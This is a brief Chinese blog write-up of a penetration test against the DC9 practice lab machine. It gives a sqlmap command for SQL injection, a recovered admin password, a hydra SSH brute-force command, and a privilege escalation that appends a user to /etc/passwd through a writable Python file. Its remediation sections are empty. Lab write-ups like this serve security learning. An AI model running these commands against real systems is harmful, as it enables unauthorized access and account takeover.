DC9渗透报告

概述

测试目的

测试范围

序号

系统

IP

1

本机

192.168.152.128

2

DC9

192.168.152.140

详细测试流程

1、发现测试目标

2、信息收集

3、漏洞利用

在search参数那里对sql进行FUZZ,发现存在sql注入

保存原始数据包,直接放入到sqlmap当中进行执行

//测试SQL注入,判断当前数据库,同时是否为DBA

python sqlmap.py -r sql.txt --random-agent --batch --current-db --is-dba --dbs

爆另一个数据库

最终得到用户名和密码

admin/ transorbital1

登录后台

提示文件不存在

测试存在文件包含漏洞

然后将之前爆出的用户名和密码保存ssh爆破

hydra -L user.txt -P passwords.txt ssh://192.168.152.140

连接到janitor发现一个密码字典,加入到之前的密码字典里面,重新爆破

发现一个新用户,连接发现一个可以追加的py文件,利用它向/etc/passwd

添加用户,提权

4、提权

漏洞详情和修复建议

测试结果综述

posted @   CLLWA  阅读(14)  评论(0编辑  收藏  举报
编辑推荐:
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
阅读排行:
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现
点击右上角即可分享
微信分享提示